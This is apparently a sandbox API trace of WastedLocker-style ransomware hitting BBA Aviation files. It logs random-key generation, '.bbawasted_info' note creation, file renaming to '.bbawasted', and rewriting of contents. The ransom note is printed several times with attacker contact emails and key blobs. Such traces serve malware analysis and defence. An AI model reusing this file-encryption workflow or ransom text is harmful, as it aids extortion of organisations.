_Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]pbYA2WLXTa60nhTOPlKozv6w9hDeaOoAKChzFZ3r5AKMpErE05JE7nmg/UuC3fAN\r\nnxo4QgFHL4wY4xTdUF8sMjMIAxj3C2JEWyAQeo1JpXYyybSeDSBUPnDFEZpMZu/q\r\n15h8AbRNqCZOGt4n7Obbpqipogx9s7Uyn+HsNNWRXywhK65yRGXxOmO6j9rbfrlr\r\nHghaZ0RzcKd8q+0pFXVlnBXuKrP1qQuWeLuKbJ+ZLx6u2wLZ31k7FUeBwZYS38X0\r\nWAa3erstQ5OfVXpOM7erxAhZyC+Ze63T+dVf5V0/GwauLSS0jCP233ecaFZNTMaj\r\nuOAuE01ooVdGtTxA44CJfxPyvkmCcOcpcO2leTotRflo8L0qxQbqdRm9V5GrUf/3\r\naMKVfQonGRDC9/GNIFB3JPJ4iAQQ3txD6rzo21Zocadktm1HQVZX6hfT1DGiWmTL\r\nQAlRdnMBLoNebftixcXf7dQsb5pil7cH2dSCH6A8qrB2+JIH5y2eNYi5vVrtzubX\r\nU2amabXWb2egHMIsLkKygmExXA/SfEt5g7sASox8jeGh0xmDcZiUchJluVNUpX05\r\nWUGPbYQ1W/7O0BSDdkKsBrjVkZAlqpgojBQfkGpwHF65PDv86F9RPaiXvPWjLGWt\r\nKa9Jf4RpW0J+aEVoVL7a/EuM3GDJdCfwgUH+ifw0oZg=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.435] WriteFile (in: hFile=0x27c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0159.435] SetEndOfFile (hFile=0x27c) returned 1 [0159.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.438] CloseHandle (hObject=0x27c) returned 1 [0159.495] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.495] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66ff00 | out: hHeap=0x660000) returned 1 [0159.495] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0159.496] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.496] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0159.496] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 39 [0159.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0159.496] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.496] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0159.497] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.497] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.497] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0159.499] WriteFile (in: hFile=0x27c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.500] SetEndOfFile (hFile=0x27c) returned 1 [0159.500] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.500] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.bbawasted")) returned 1 [0159.501] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0159.501] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0159.501] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe8e [0159.502] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe8e) returned 0x640000 [0159.502] CloseHandle (hObject=0x290) returned 1 [0159.504] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0159.504] CloseHandle (hObject=0x294) returned 1 [0159.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0159.505] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0159.505] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0159.505] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.505] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0159.506] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0159.506] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.514] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.514] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]G4KmSMQFbdPcMc3SMAD3XAD1wAHswwr/lWoRCQwUkOUcRl7/vs3XNrIgWHoQM/wT\r\nP2KPEik0FMlxMc3Bj0gPVbcWOGirhnq2w4YaARTAUVBnb395nxjxKF+iryPxcYXm\r\nV9sGvwc1anT/5e5pcsfAMsABSeJcjb8TEcu6AexHqpNWyZtO6UP/zjoASZZssLZu\r\neXrDfFDnhO7AI9PnTwOlrPa1Ww4CSD7EL3vDIthUaunT6p8X3oltQhPnNWXNrYyX\r\nbPl7YWR8H3ceFaMiZ2eg/P9uhLvrX8XRvP69uvnoeK/JNmJ4fcuB+4HR2J/QN4mu\r\nura+4BlKCNxY+eTISlDrWLQz0LIiyiKKFIoq0sw8kgzv3QcPO5XJoKL03VPJ44cu\r\nyjLqvz4gKtTUmzehcU/STlV/C7Ft4ZmDByGw05lwJCzh8DKsOO361/K9iq1jO07a\r\nmtA8SfJl+nnUgtqjSNBIWYfR59182tRPPSMY2h3+qSiN9ocPt/RcHv9E1c0EQT19\r\n1isYrdj3sM+cb9HT/ZkE6FDmw/bMa6PQrF9+yevfdz3soZyj9HYT/WKXBAmbNNgD\r\nvDofLigvRsHjSyQPAzqLUcpmPSX+Bz1+6efNkt8un9LdaBW6yjgztO3YnJ0gfjEm\r\nacABAN0U9IEb1J7VYlYGTYQQYbAQ3cy1eEDHYsptHZ1=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.514] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.514] WriteFile (in: hFile=0x27c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0159.514] SetEndOfFile (hFile=0x27c) returned 1 [0159.517] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.517] CloseHandle (hObject=0x27c) returned 1 [0159.519] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.519] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66fa18 | out: hHeap=0x660000) returned 1 [0159.519] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0159.520] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.520] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0159.520] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 48 [0159.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0159.520] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.520] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0159.521] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.521] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.521] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0159.521] WriteFile (in: hFile=0x27c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.655] SetEndOfFile (hFile=0x27c) returned 1 [0159.655] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.655] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.655] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.bbawasted")) returned 1 [0159.656] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0159.656] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0159.656] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x13c4a [0159.656] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13c4a) returned 0x630000 [0159.657] CloseHandle (hObject=0x280) returned 1 [0159.665] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.666] CloseHandle (hObject=0x28c) returned 1 [0159.666] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6be308 [0159.666] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0159.666] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x6be350 | out: pbBuffer=0x6be350) returned 1 [0159.666] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.667] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0159.667] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0159.667] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.678] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x68a268 [0159.678] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.678] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.678] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RZsyWaDmOr8FtY2t2+Q/bR0M4vFfzyEPdjH/CW7UbgR2LN/OLp2K4iEmOB8ofBk7\r\nUEGYcFIdBRo5OQDq9WblP9vBmOFKJqJm4wL/EOQeOLT84GGdSHZN00tm3MXUcCPQ\r\n2TcL0RpchEssJUZHAIkN1RpvwRyLsJhyMxhtCkePR1lvXhvhkM6lnBysjwiQyPbX\r\nvKupp69yoBzd3tYG/D1wZQhSDgSduTjLTuL/Nso0FCEPWjOoLrfvHcDxGoX/OWkT\r\nMro8UgNvxciA17bQF2s++VoplzwJhE2MjuWymwjQALrnuVqDyLiSgwqUMWb5Wgwl\r\n6Vo7tmR1raLe45bEpmedoZMSfFahwfwjZXpf0maVrB0G0/OwoLrnN9cZanGvBaHm\r\nkNrNs6iIJSW6V3+VrI3GHPNN6w+w9Ky0s+1azJHNT5/mkzz6Pfzk71bmBJ85Zqse\r\neEqBPdP1KRWITFvVTAp21FoiaMlQFdayTNMw81lyRmyWnYspLOhYzZNNOWVkLncf\r\nqoIkDKPEt4BviQT/2hCDEF+EFVO7K2EOb14qvon6nANhj470q0eJmgKqlZMtqlgK\r\nK6qfjCum+JlJpFI6lKtZlhJPmhtDB5XEtRT68AE34aUCgqQwcHfSpO/nNS401aYO\r\n05CGb3dpTBMqLCS2CJCRtPsYFpvXpUgPmUGJvVkFPxg=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.678] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x68a268 | out: hHeap=0x660000) returned 1 [0159.678] WriteFile (in: hFile=0x27c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0159.679] SetEndOfFile (hFile=0x27c) returned 1 [0159.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.681] CloseHandle (hObject=0x27c) returned 1 [0159.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0159.686] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0159.686] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.686] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0159.686] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 48 [0159.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0159.687] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.687] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0159.687] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.687] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.687] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0159.729] WriteFile (in: hFile=0x27c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.730] SetEndOfFile (hFile=0x27c) returned 1 [0159.730] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.730] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.730] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.bbawasted")) returned 1 [0159.731] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0159.732] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0159.732] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x12fb4 [0159.732] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12fb4) returned 0x630000 [0159.732] CloseHandle (hObject=0x28c) returned 1 [0159.740] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.740] CloseHandle (hObject=0x280) returned 1 [0159.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0159.741] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0159.741] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0159.741] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.741] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0159.742] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0159.742] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.753] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.753] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.753] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fECdw3eYAnzJ/gca7csrCJrmBDsvOjTZ++v3VQV8yIHfLppzlQy7OmfJAhQwYIb5\r\nYMhlYV6KWvF/MbG2T8xpQjd1Wpp1z3J/H8MC/wLxlSk6PR9esyEOJVZZSerm8RZg\r\nJquRVRFbtYqeKAu501oqWIAjwq5+mJ7j1liXgh7AmLgoDlp2K/kJ1rAXsY+HPucF\r\nUyJ5ZpLKojBOAnF+bA17AVUPVt9N6kXeWsSHDnAovMr9/mEzP9RKHmd5D7S6AJuU\r\nP7QZuEW5QoZiTa+z+dzI7mxIjv77bNa0W2mje430aDeP/AGpOi4PO90pOrpKZ+wl\r\nJH9b3hw4a3JUSgrF2e/04Bo3H8X0RD3VNmgc0aTEXb5SF2o3hRCOV/5U59cOmNBJ\r\nxeaTZSQDQIF+GUYUBCmcYMwVV3KDYjA0waQ96pBUFg0WWzHM+7aihp2wg9biA0o/\r\nx7k88IaUbHpNwBrkxG5F1Un/NWUmvmKkzPNjdrGVghNiuteWYiuplxX6U/Shx25q\r\nm8iMBmvE7bsrtSTHSMi0qZ/nE4t2LKGYFT1s0UJ9TKDaIz/jHTiSHTVMGDu1oCDs\r\nHewQRYebJMomBr10l+hu7MmeAYQ+2W6S/nhrNanz0oHWhQWfkwcPJdhXjxXkN9Yp\r\nXx5IfTPyEHLXyfiGiYMP88x4ErSSAqodcGSeieiPl1S=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.753] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0159.754] SetEndOfFile (hFile=0x27c) returned 1 [0159.757] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.757] CloseHandle (hObject=0x27c) returned 1 [0159.766] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.766] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689f58 | out: hHeap=0x660000) returned 1 [0159.767] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0159.767] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.768] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 